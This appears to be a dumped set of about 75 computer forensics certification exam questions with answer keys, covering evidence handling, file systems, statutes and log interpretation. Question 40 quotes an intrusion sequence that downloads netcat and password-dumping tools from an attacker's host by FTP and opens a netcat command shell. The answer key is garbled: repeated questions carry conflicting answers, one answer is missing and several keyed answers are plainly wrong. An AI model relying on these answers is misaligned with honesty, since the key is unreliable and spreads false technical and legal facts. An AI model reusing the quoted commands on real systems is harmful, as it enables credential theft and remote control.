QUESTION 1
When an investigator contacts by telephone the domain administrator or controller listed by a
whois lookup to request all e-mails sent and received for a user account be preserved, what
U.S.C. statute authorizes this phone call and obligates the ISP to preserve e-mail records?

A. Title 18, Section 1030
B. Title 18, Section 2703(d)
C. Title 18, Section Chapter 90
D. Title 18, Section 2703(f)

Answer: D

QUESTION 2
If you come across a sheepdip machine at your client site, what would you infer?

A. A sheepdip coordinates several honeypots
B. A sheepdip computer is another name for a honeypot
C. A sheepdip computer is used only for virus-checking.
D. A sheepdip computer defers a denial of service attack

Answer: C

QUESTION 3
In a computer forensics investigation, what describes the route that evidence takes from the time
you find it until the case is closed or goes to court?

A. rules of evidence
B. law of probability
C. chain of custody
D. policy of separation

Answer: C

QUESTION 4
How many characters long is the fixed-length MD5 algorithm checksum of a critical system file?

A. 128
B. 64
C. 32
D. 16

Answer: C

QUESTION 5
To calculate the number of bytes on a disk, the formula is: CHS**
A. number of circles x number of halves x number of sides x 512 bytes per sector
B. number of cylinders x number of halves x number of shims x 512 bytes per sector
C. number of cells x number of heads x number of sides x 512 bytes per sector
D. number of cylinders x number of halves x number of shims x 512 bytes per sector

Answer:

QUESTION 6
What does the superblock in Linux define?

A. file system names
B. available space
C. location of the first inode
D. disk geometry

Answer: B, C, D

QUESTION 7
A honey pot deployed with the IP 172.16.1.108 was compromised by an attacker . Given below is
an excerpt from a Snort binary capture of the attack. Decipher the activity carried out by the
attacker by studying the log. Please note that you are required to infer only what is explicit in the
excerpt. (Note: The student is being tested on concepts learnt during passive OS fingerprinting,
basic TCP/IP connection concepts and the ability to read packet signatures from a sniff dump.)
03/15-20:21:24.107053 211.185.125.124:3500 -> 172.16.1.108:111
TCP TTL:43 TOS:0x0 ID:29726 IpLen:20 DgmLen:52 DF
***A**** Seq: 0x9B6338C5 Ack: 0x5820ADD0 Win: 0x7D78 TcpLen: 32
TCP Options (3) => NOP NOP TS: 23678634 2878772
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=
03/15-20:21:24.452051 211.185.125.124:789 -> 172.16.1.103:111
UDP TTL:43 TOS:0x0 ID:29733 IpLen:20 DgmLen:84
Len: 64
01 0A 8A 0A 00 00 00 00 00 00 00 02 00 01 86 A0 ................
00 00 00 02 00 00 00 03 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 01 86 B8 00 00 00 01 ................
00 00 00 11 00 00 00 00 ........
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=
03/15-20:21:24.730436 211.185.125.124:790 -> 172.16.1.103:32773
UDP TTL:43 TOS:0x0 ID:29781 IpLen:20 DgmLen:1104
Len: 1084
47 F7 9F 63 00 00 00 00 00 00 00 02 00 01 86 B8 G..c............
00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 20 ...............
3A B1 5E E5 00 00 00 09 6C 6F 63 61 6C 68 6F 73 :.^.....localhost
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=
+
03/15-20:21:36.539731 211.185.125.124:4450 -> 172.16.1.108:39168
TCP TTL:43 TOS:0x0 ID:31660 IpLen:20 DgmLen:71 DF
***AP*** Seq: 0x9C6D2BFF Ack: 0x59606333 Win: 0x7D78 TcpLen: 32
TCP Options (3) => NOP NOP TS: 23679878 2880015
63 64 20 2F 3B 20 75 6E 61 6D 65 20 2D 61 3B 20 cd /; uname -a;
69 64 3B id;

A. The attacker has conducted a network sweep on port 111
B. The attacker has scanned and exploited the system using Buffer Overflow
C. The attacker has used a Trojan on port 32773
D. The attacker has installed a backdoor

Answer: A

QUESTION 8
The newer Macintosh Operating System is based on:

A. OS/2
B. BSD Unix
C. Linux
D. Microsoft Windows

Answer: B

QUESTION 9
Before you are called to testify as an expert, what must an attorney do first?

A. engage in damage control
B. prove that the tools you used to conduct your examination are perfect
C. read your curriculum vitae to the jury
D. qualify you as an expert witness

Answer: D

QUESTION 10
You are contracted to work as a computer forensics investigator for a regional bank that has four
30 TB storage area networks that store customer data. What method would be most efficient for
you to acquire digital evidence from this network?

A. create a compressed copy of the file with DoubleSpace
B. create a sparse data copy of a folder or file
C. make a bit-stream disk-to-image fileC
D. make a bit-stream disk-to-disk file

Answer: C
QUESTION 11
You are working for a large clothing manufacturer as a computer forensics investigator and are
called in to investigate an unusual case of an employee possibly stealing clothing designs from
the company and selling them under a different brand name for a different company. What you
discover during the course of the investigation is that the clothing designs are actually original
products of the employee and the company has no policy against an employee selling his own
designs on his own time. The only thing that you can find that the employee is doing wrong is that
his clothing design incorporates the same graphic symbol as that of the company with only the
wording in the graphic being different. What area of the law is the employee violating?

A. trademark law
B. copyright law
C. printright law
D. brandmark law

Answer: A

QUESTION 12
What file structure database would you expect to find on floppy disks?

A. NTFS
B. FAT32
C. FAT16
D. FAT12

Answer: D

QUESTION 13
What type of attack occurs when an attacker can force a router to stop forwarding packets by
flooding the router with many open connections simultaneously so that all the hosts behind the
router are effectively disabled?

A. digital attack
B. denial of service
C. physical attack
D. ARP redirect

Answer: B

QUESTION 14
When examining a file with a Hex Editor, what space does the file header occupy?

A. the last several bytes of the file
B. the first several bytes of the file
C. none, file headers are contained in the FAT
D. one byte at the beginning of the file
Answer: D

QUESTION 15
In the context of file deletion process, which of the following statement holds true?

A. When files are deleted, the data is overwritten and the cluster marked as available
B. The longer a disk is in use, the less likely it is that deleted files will be overwritten
C. While booting, the machine may create temporary files that can delete evidence
D. Secure delete programs work by completely overwriting the file in one go

Answer: C

QUESTION 16
A suspect is accused of violating the acceptable use of computing resources, as he has visited
adult websites and downloaded images. The investigator wants to demonstrate that the suspect
did indeed visit these sites. However, the suspect has cleared the search history and emptied the
cookie cache. Moreover, he has removed any images he might have downloaded. What can the
investigator do to prove the violation? Choose the most feasible option.

A. Image the disk and try to recover deleted files
B. Seek the help of co-workers who are eye-witnesses
C. Check the Windows registry for connection data (You may or may not recover)
D. Approach the websites for evidence

Answer: A

QUESTION 17
A(n) _____________________ is one that's performed by a computer program rather than the
attacker manually performing the steps in the attack sequence.

A. blackout attack
B. automated attack
C. distributed attack
D. central processing attack

Answer: B

QUESTION 18
The offset in a hexadecimal code is:

A. The last byte after the colon
B. The 0x at the beginning of the code
C. The 0x at the end of the code
D. The first byte after the colon
Answer: B

QUESTION 19
It takes _____________ mismanaged case/s to ruin your professional reputation as a computer
forensics examiner?

A. by law, three
B. quite a few
C. only one
D. at least two

Answer: C

QUESTION 20
With the standard Linux second extended file system (Ext2fs), a file is deleted when the inode
internal link count reaches ________.

A. 0
B. 10
C. 100
D. 1

Answer: A

QUESTION 21
When examining the log files from a Windows IIS Web Server, how often is a new log file
created?

A. the same log is used at all times
B. a new log file is created everyday
C. a new log file is created each week
D. a new log is created each time the Web Server is started

Answer: A

QUESTION 22
Which part of the Windows Registry contains the user's password file?

A. HKEY_LOCAL_MACHINE
B. HKEY_CURRENT_CONFIGURATION
C. HKEY_USER
D. HKEY_CURRENT_USER

Answer: A
QUESTION 23
An employee is attempting to wipe out data stored on a couple of compact discs (CDs) and digital
video discs (DVDs) by using a large magnet. You inform him that this method will not be effective
in wiping out the data because CDs and DVDs are ______________ media used to store large
amounts of data and are not affected by the magnet.

A. logical
B. anti-magnetic
C. magnetic
D. optical

Answer: D

QUESTION 24
Lance wants to place a honeypot on his network. Which of the following would be your
recommendations?

A. Use a system that has a dynamic addressing on the network
B. Use a system that is not directly interacing with the router
C. Use it on a system in an external DMZ in front of the firewall
D. It doesn't matter as all replies are faked

Answer: D

QUESTION 25
What does the acronym POST mean as it relates to a PC?

A. Primary Operations Short Test
B. Power On Self Test
C. Pre Operational Situation Test
D. Primary Operating System Test

Answer: B

QUESTION 26
Which legal document allows law enforcement to search an office, place of business, or other
locale for evidence relating to an alleged crime?

A. bench warrant
B. wire tap
C. subpoena
D. search warrant

Answer: D
QUESTION 27
You are working as an investigator for a corporation and you have just received instructions from
your manager to assist in the collection of 15 hard drives that are part of an ongoing investigation.
Your job is to complete the required evidence custody forms to properly document each piece of
evidence as it is collected by other members of your team. Your manager instructs you to
complete one multi-evidence form for the entire case and a single-evidence form for each hard
drive. How will these forms be stored to
help preserve the chain of custody of the case?

A. All forms should be placed in an approved secure container because they are now
primary evidence in the case.
B. The multi-evidence form should be placed in the report file and the single-evidence
forms should be kept with each hard drive in an approved secure container.
C. The multi-evidence form should be placed in an approved secure container with the
hard drives and the single-evidence forms should be placed in the report file.
D. All forms should be placed in the report file because they are now primary evidence
in the case.

Answer: B

QUESTION 28
The MD5 program is used to:

A. wipe magnetic media before recycling it
B. make directories on a evidence disk
C. view graphics files on an evidence drive
D. verify that a disk is not altered when you examine it

Answer: D

QUESTION 29
Which is a standard procedure to perform during all computer forensics investigations?

A. with the hard drive removed from the suspect PC, check the date and time in the system's
CMOS
B. with the hard drive in the suspect PC, check the date and time in the File Allocation Table
C. with the hard drive removed from the suspect PC, check the date and time in the system's
RAM
D. with the hard drive in the suspect PC, check the date and time in the system's CMOS

Answer: A

QUESTION 30
E-mail logs contain which of the following information to help you in your investigation?
(Select up to 4)
A. user account that was used to send the account
B. attachments sent with the e-mail message
C. unique message identifier
D. contents of the e-mail message
E. date and time the message was sent

Answer: A, C, D, E

QUESTION 31
In a forensic examination of hard drives for digital evidence, what type of user is most likely to
have the most file slack to analyze?

A. one who has NTFS 4 or 5 partitions
B. one who uses dynamic swap file capability
C. one who uses hard disk writes on IRQ 13 and 21
D. one who has lots of allocation units per block or cluster

Answer: D

QUESTION 32
In what way do the procedures for dealing with evidence in a criminal case differ from the
procedures for dealing with evidence in a civil case?

A. evidence must be handled in the same way regardless of the type of case
B. evidence procedures are not important unless you work for a law enforcement agency
C. evidence in a criminal case must be secured more tightly than in a civil case
D. evidence in a civil case must be secured more tightly than in a criminal case

Answer: C

QUESTION 33
You are assigned to work in the computer forensics lab of a state police agency. While working
on a high profile criminal case, you have followed every applicable procedure, however your boss
is still concerned that the defense attorney might question weather evidence has been changed
while at the lab. What can you do to prove that the evidence is the same as it was when it first
entered the lab?

A. make an MD5 hash of the evidence and compare it with the original MD5 hash that was taken
when the evidence first entered the lab
B. make an MD5 hash of the evidence and compares it to the standard database developed by
NIST
C. there is no reason to worry about this possible claim because state labs are certified
D. sign a statement attesting that the evidence is the same as it was when it entered the lab

Answer: A
QUESTION 34
Study the log given below and answer the following question:
Apr 24 14:46:46 [4663]: spp_portscan: portscan detected from 194.222.156.169
Apr 24 14:46:46 [4663]: IDS27/FIN Scan: 194.222.156.169:56693 -> 172.16.1.107:482
Apr 24 18:01:05 [4663]: IDS/DNS-version-query: 212.244.97.121:3485 -> 172.16.1.107:53
Apr 24 19:04:01 [4663]: IDS213/ftp-passwd-retrieval: 194.222.156.169:1425 -> 172.16.1.107:21
Apr 25 08:02:41 [5875]: spp_portscan: PORTSCAN DETECTED from 24.9.255.53
Apr 25 02:08:07 [5875]: IDS277/DNS-version-query: 63.226.81.13:4499 -> 172.16.1.107:53
Apr 25 02:08:07 [5875]: IDS277/DNS-version-query: 63.226.81.13:4630 -> 172.16.1.101:53
Apr 25 02:38:17 [5875]: IDS/RPC-rpcinfo-query: 212.251.1.94:642 -> 172.16.1.107:111
Apr 25 19:37:32 [5875]: IDS230/web-cgi-space-wildcard: 198.173.35.164:4221 ->
172.16.1.107:80
Apr 26 05:45:12 [6283]: IDS212/dns-zone-transfer: 38.31.107.87:2291 -> 172.16.1.101:53
Apr 26 06:43:05 [6283]: IDS181/nops-x86: 63.226.81.13:1351 -> 172.16.1.107:53
Apr 26 06:44:25 victim7 PAM_pwdb[12509]: (login) session opened for user simple by (uid=0)
Apr 26 06:44:36 victim7 PAM_pwdb[12521]: (su) session opened for user simon by
simple(uid=506)
Apr 26 06:45:34 [6283]: IDS175/socks-probe: 24.112.167.35:20 -> 172.16.1.107:1080
Apr 26 06:52:10 [6283]: IDS127/telnet-login-incorrect: 172.16.1.107:23 -> 213.28.22.189:4558
Precautionary measures to prevent this attack would include writing firewall rules. Of these
firewall rules, which among the following would be appropriate?

A. Disallow UDP 53 in from outside to DNS server
B. Allow UDP 53 in from DNS server to outside
C. Disallow TCP 53 in from secondaries or ISP server to DNS server
D. Block all UDP traffic

Answer: A

QUESTION 35
When monitoring for both intrusion and security events between multiple computers, it is essential
that the computers' clocks are synchronized. Synchronized time allows an administrator to
reconstruct what took place during an attack against multiple computers. Without synchronized
time, it is very difficult to determine exactly when specific events took place, and how events
interlace. What is the name of the service used to synchronize time among multiple computers?

A. Universal Time Set
B. Network Time Protocol
C. SyncTime Service
D. Time-Sync Protocol

Answer: B

QUESTION 36
When investigating a potential e-mail crime, what is your first step in the investigation?
A. Trace the IP address to its origin
B. Write a report
C. Determine whether a crime was actually committed
D. Recover the evidence

Answer: A

QUESTION 37
If you discover a criminal act while investigating a corporate policy abuse, it becomes a publicsector
investigation and should be referred to law enforcement?

A. True
B. False

Answer: B

QUESTION 38
The following excerpt is taken from a honeypot log. The log captures activities across three days.
There are several intrusion attempts; however, a few are successful.
(Note: The objective of this question is to test whether the student can read basic information
from log entries and interpret the nature of attack.)
Apr 24 14:46:46 [4663]: spp_portscan: portscan detected from 194.222.156.169
Apr 24 14:46:46 [4663]: IDS27/FIN Scan: 194.222.156.169:56693 -> 172.16.1.107:482
Apr 24 18:01:05 [4663]: IDS/DNS-version-query: 212.244.97.121:3485 -> 172.16.1.107:53
Apr 24 19:04:01 [4663]: IDS213/ftp-passwd-retrieval: 194.222.156.169:1425 -> 172.16.1.107:21
Apr 25 08:02:41 [5875]: spp_portscan: PORTSCAN DETECTED from 24.9.255.53
Apr 25 02:08:07 [5875]: IDS277/DNS-version-query: 63.226.81.13:4499 -> 172.16.1.107:53
Apr 25 02:08:07 [5875]: IDS277/DNS-version-query: 63.226.81.13:4630 -> 172.16.1.101:53
Apr 25 02:38:17 [5875]: IDS/RPC-rpcinfo-query: 212.251.1.94:642 -> 172.16.1.107:111
Apr 25 19:37:32 [5875]: IDS230/web-cgi-space-wildcard: 198.173.35.164:4221 ->
172.16.1.107:80
Apr 26 05:45:12 [6283]: IDS212/dns-zone-transfer: 38.31.107.87:2291 -> 172.16.1.101:53
Apr 26 06:43:05 [6283]: IDS181/nops-x86: 63.226.81.13:1351 -> 172.16.1.107:53
Apr 26 06:44:25 victim7 PAM_pwdb[12509]: (login) session opened for user simple by (uid=0)
Apr 26 06:44:36 victim7 PAM_pwdb[12521]: (su) session opened for user simon by
simple(uid=506)
Apr 26 06:45:34 [6283]: IDS175/socks-probe: 24.112.167.35:20 -> 172.16.1.107:1080
Apr 26 06:52:10 [6283]: IDS127/telnet-login-incorrect: 172.16.1.107:23 -> 213.28.22.189:4558
From the options given below choose the one which best interprets the following entry:
Apr 26 06:43:05 [6283]: IDS181/nops-x86: 63.226.81.13:1351 -> 172.16.1.107:53

A. An IDS evasion technique
B. A buffer overflow attempt
C. A DNS zone transfer
D. Data being retrieved from 63.226.81.13
Answer: A

QUESTION 39
What happens when a file is deleted by a Microsoft operating system using the FAT file system?

A. only the reference to the file is removed from the FAT
B. the file is erased and cannot be recovered
C. a copy of the file is stored and the original file is erased
D. the file is erased but can be recovered

Answer: A

QUESTION 40
The following excerpt is taken from a honeypot log that was hosted at lab.wiretrip.net. Snort
reported Unicode attacks from 213.116.251.162. The File Permission Canonicalization
vulnerability (UNICODE attack) allows scripts to be run in arbitrary folders that do not normally
have the right to run scripts. The attacker tries a Unicode attack and eventually succeeds in
displaying boot.ini. He then switches to playing with RDS, via msadcs.dll. The RDS vulnerability
allows a malicious user to construct SQL statements that will execute shell commands (such as
CMD.EXE) on the IIS server. He does a quick query to discover that the directory exists, and a
query to msadcs.dll shows that it is functioning correctly. The attacker makes a RDS query which
results in the commands run as shown below.
"cmd1.exe /c open 213.116.251.162 >ftpcom"
"cmd1.exe /c echo johna2k >>ftpcom"
"cmd1.exe /c echo haxedj00 >>ftpcom"
"cmd1.exe /c echo get nc.exe >>ftpcom"
"cmd1.exe /c echo get pdump.exe >>ftpcom"
"cmd1.exe /c echo get samdump.dll >>ftpcom"
"cmd1.exe /c echo quit >>ftpcom"
"cmd1.exe /c ftp -s:ftpcom"
"cmd1.exe /c nc -l -p 6969 -e cmd1.exe"
What can you infer from the exploit given?

A. It is a local exploit where the attacker logs in using username johna2k
B. There are two attackers on the system - johna2k and haxedj00
C. The attack is a remote exploit and the hacker downloads three files
D. The attacker is unsuccessful in spawning a shell as he has specified a high end UDP port

Answer: A

QUESTION 41
What term is used to describe a cryptographic technique for embedding information into
something else for the sole purpose of hiding that information from the casual observer?

A. rootkit
B. key escrow
C. steganography
D. Offset

Answer: C

QUESTION 42
During the course of an investigation, you locate evidence that may prove the innocence of the
suspect of the investigation. You must maintain an unbiased opinion and be objective in your
entire fact finding process. Therefore you report this evidence. This type of evidence is known as:

A. Inculpatory evidence
B. mandatory evidence
C. exculpatory evidence
D. Terrible evidence

Answer: C

QUESTION 43
Corporate investigations are typically easier than public investigations because:

A. the investigator has to get a warrant
B. the users have standard corporate equipment and software
C. the investigator does not have to get a warrant
D. the users can load whatever they want on their machines

Answer: B

QUESTION 44
What binary coding is used most often for e-mail purposes?

A. MIME
B. Uuencode
C. IMAP
D. SMTP

Answer: A

QUESTION 45
If you see the files Zer0.tar.gz and copy.tar.gz on a Linux system while doing an investigation,
what can you conclude?

A. The system files have been copied by a remote attacker
B. The system administrator has created an incremental backup
C. The system has been compromised using a t0rn rootkit
D. Nothing in particular as these can be operational files
Answer: D

QUESTION 46
From the following spam mail header, identify the host IP that sent this spam?
From jie02@netvigator.com jie02@netvigator.com Tue Nov 27 17:27:11 2001
Received: from viruswall.ie.cuhk.edu.hk (viruswall [137.189.96.52]) by eng.ie.cuhk.edu.hk
(8.11.6/8.11.6) with
ESMTP id
fAR9RAP23061 for ; Tue, 27 Nov 2001 17:27:10 +0800 (HKT)
Received: from mydomain.com (pcd249020.netvigator.com [203.218.39.20]) by
viruswall.ie.cuhk.edu.hk
(8.12.1/8.12.1)
with SMTP id fAR9QXwZ018431 for ; Tue, 27 Nov 2001 17:26:36 +0800 (HKT)
Message-Id: >200111270926.fAR9QXwZ018431@viruswall.ie.cuhk.edu.hk
From: "china hotel web"
To: "Shlam"
Subject: SHANGHAI (HILTON HOTEL) PACKAGE
Date: Tue, 27 Nov 2001 17:25:58 +0800 MIME-Version: 1.0
X-Priority: 3 X-MSMail-
Priority: Normal
Reply-To: "china hotel web"

A. 137.189.96.52
B. 8.12.1.0
C. 203.218.39.20
D. 203.218.39.50

Answer: C

QUESTION 47
If you plan to startup a suspect's computer, you must modify the ___________ to ensure that you
do not contaminate or alter data on the suspect's hard drive by booting to the hard drive.

A. deltree command
B. CMOS
C. Boot.sys
D. Scandisk utility

Answer: C

QUESTION 48
You are working for a local police department that services a population of 1,000,000 people and
you have been given the task of building a computer forensics lab. How many law-enforcement
computer investigators should you request to staff the lab?
A. 8
B. 1
C. 4
D. 2

Answer: C

QUESTION 49
When obtaining a warrant it is important to:

A. particularly describe the place to be searched and particularly describe the items to be seized
B. generally describe the place to be searched and particularly describe the items to be seized
C. generally describe the place to be searched and generally describe the items to be seized
D. particularly describe the place to be searched and generally describe the items to be seized

Answer: A

QUESTION 50
If a suspect computer is located in an area that may have toxic chemicals, you must:

A. assume the suspect machine is contaminated
B. coordinate with the HAZMAT team
C. do not enter alone
D. determine a way to obtain the suspect computer

Answer: B

QUESTION 51
Diskcopyis:

A. a utility by AccessData
B. a standard MS-DOS command
C. Digital Intelligence utility
D. dd copying tool

Answer: C

QUESTION 52
Sectors in hard disks typically contain how many bytes?

A. 256
B. 512
C. 1024
D. 2048

Answer: B
QUESTION 53
Area density refers to:

A. the amount of data per disk
B. the amount of data per partition
C. the amount of data per square inch
D. the amount of data per platter

Answer: A

QUESTION 54
When an investigator contacts by telephone the domain administrator or controller listed by a
whois lookup to request all e-mails sent and received for a user account be preserved, what
U.S.C. statute authorizes this phone call and obligates the ISP to preserve e-mail records?

A. Title 18, Section 1030
B. Title 18, Section Chapter 90
C. Title 18, Section 2703(d)
D. Title 18, Section 2703(f)

Answer: C

QUESTION 55
How many characters long is the fixed-length MD5 algorithm checksum of a critical syfile?

A. 16
B. 32
C. 64
D. 128

Answer: B

QUESTION 56
Jason is the security administrator of ACMA metal Corporation. One day he notices the
company's Oracle database server has been compromised and the customer information along
with financial data has been stolen. The financial loss will be in millions of dollars if the database
gets into the hands of the competitors. Jason wants to report this crime to the law enforcement
agencies immediately. Which organization coordinates computer crimes investigations throughout
the United States?

A. Internet Fraud Complaint Center
B. Local or national office of the U.S. Secret Service
C. National Infrastructure Protection Center
D. CERT Coordination Center
Answer: B

QUESTION 57
Which Intrusion Detection System (IDS) usually produces the most false alarms due to the
unpredictable behaviors of users and networks?

A. network-based IDS systems (NIDS)
B. host-based IDS systems (HIDS)
C. anomaly detection
D. signature recognition

Answer: B

QUESTION 58
In a forensic examination of hard drives for digital evidence, what type of user is most likely to
have the most file slack to analyze?

A. one who has lots of allocation units per block or cluster
B. one who has NTFS 4 or 5 partitions
C. one who uses dynamic swap file capability
D. one who uses hard disk writes on IRQ 13 and 21

Answer: A

QUESTION 59
Which part of the Windows Registry contains the user's password file?

A. HKEY_CURRENT_USER
B. HKEY_USER
C. HKEY_LOCAL_MACHINE
D. HKEY_CURRENT_CONFIGURATION

Answer: C

QUESTION 60
What header field in the TCP/IP protocol stack involves the hacker exploit known as the Ping of
Death?

A. ICMP header field
B. TCP header field
C. IP header field
D. UDP header field

Answer: B
QUESTION 61
What method of computer forensics will allow you to trace all ever-established user accounts on a
Windows 2000 sever the course of its lifetime?

A. forensic duplication of hard drive
B. analysis of volatile data
C. comparison of MD5 checksums
D. review of SIDs in the Registry

Answer: C

QUESTION 62
Which response organization tracks hoaxes as well as viruses?

A. NIPC
B. FEDCIRC
C. CERT
D. CIAC

Answer: D

QUESTION 63
Which federal computer crime law specifically refers to fraud and related activity in connection
with access devices like routers?

A. 18 U.S.C. 1029
B. 18 U.S.C. 1362
C. 18 U.S.C. 2511
D. 18 U.S.C. 2703

Answer: A

QUESTION 64
Office documents (Word, Excel, and PowerPoint) contain a code that allows tracking the MAC, or
unique identifier, of the machine that created the document. What is that code called?

A. the Microsoft Virtual Machine Identifier
B. the Personal Application Protocol
C. the Globally Unique ID
D. the Individual ASCII String

Answer: C

QUESTION 65
What TCP/UDP port does the toolkit program netstat use?
A. Port 7
B. Port 15
C. Port 23
D. Port 69

Answer: B

QUESTION 66
Under which Federal Statutes does FBI investigate for computer crimes involving e-mail scams
and mail fraud?

A. 18 U.S.C. 1029 Possession of Access Devices
B. 18 U.S.C. 1030 Fraud and related activity in connection with computers
C. 18 U.S.C. 1343 Fraud by wire, radio or television
D. 18 U.S.C. 1361 Injury to Government Property
E. 18 U.S.C. 1362 Government communication systems
F. 18 U.S.C. 1831 Economic Espionage Act
G. 18 U.S.C. 1832 Trade Secrets Act

Answer: B

QUESTION 67
In a FAT32 system, a 123 KB file will use how many sectors?

A. 34
B. 25
C. 11
D. 56

Answer: B

QUESTION 68
What does the superblock in Linux define?

A. file synames
B. disk geometr
C. location of the first inode
D. available space

Answer: C

QUESTION 69
Why should you note all cable connections for a computer you want to seize as evidence?

A. to know what outside connections existed
B. in case other devices were connected
C. to know what peripheral devices exist
D. to know what hardware existed

Answer: A

QUESTION 70
You should make at least how many bit-stream copies of a suspect drive?

A. 1
B. 2
C. 3
D. 4

Answer: B

QUESTION 71
Which of the following should a computer forensics lab used for investigations have?

A. isolation
B. restricted access
C. open access
D. an entry log

Answer: B

QUESTION 72
Corporate investigations are typically easier than public investigations because:

A. the users have standard corporate equipment and software
B. the investigator does not have to get a warrant
C. the investigator has to get a warrant
D. the users can load whatever they want on their machines

Answer: B

QUESTION 73
If you discover a criminal act while investigating a corporate policy abuse, it becomes a publicsector
investigation and should be referred to law enforcement?

A. true
B. false

Answer: A

QUESTION 74
If a suspect computer is located in an area that may have toxic chemicals, you must:
A. coordinate with the HAZMAT team
B. determine a way to obtain the suspect computer
C. assume the suspect machine is contaminated
D. do not enter alone

Answer: A

QUESTION 75
You are using DriveSpy, a forensic tool and want to copy 150 sectors where the starting sector is
1709 on the primary hard drive. Which of the following formats correctly specifies these sectors?

A. 0:1000, 150
B. 0:1709, 150
C. 1:1709, 150
D. 0:1709-1858

Answer: B